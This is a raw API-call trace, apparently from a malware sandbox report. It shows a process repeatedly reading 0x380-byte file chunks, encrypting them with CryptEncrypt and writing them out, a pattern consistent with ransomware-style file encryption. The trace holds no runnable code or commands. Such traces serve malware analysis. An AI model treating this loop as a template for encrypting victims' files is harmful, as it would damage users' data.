[0269.248] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.249] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.249] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.249] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.249] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.249] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.249] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.249] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.249] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.249] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.250] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.250] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.250] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.250] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.250] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.250] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.250] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.250] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.250] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.250] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.250] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.251] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.251] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.251] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.251] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.251] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.251] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.251] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.251] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.251] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.251] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.251] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.251] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.251] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.252] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.252] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.252] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.252] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.252] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.252] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.252] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.252] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.252] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.252] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.252] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.252] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.253] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.253] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.253] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.253] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.253] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.253] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.253] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.253] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.253] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.253] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.253] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.253] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.253] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.254] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.254] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.254] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.254] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.254] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.254] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.254] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.254] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.254] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.254] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.254] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.254] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.254] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.254] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.255] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.255] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.255] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.255] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.255] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.255] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.255] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.255] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.255] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.255] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.255] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.255] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.255] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.256] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.256] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.256] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.256] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.256] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.256] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.256] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.256] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.256] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.256] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.256] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.256] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.256] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.257] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.257] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.257] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.257] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.257] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 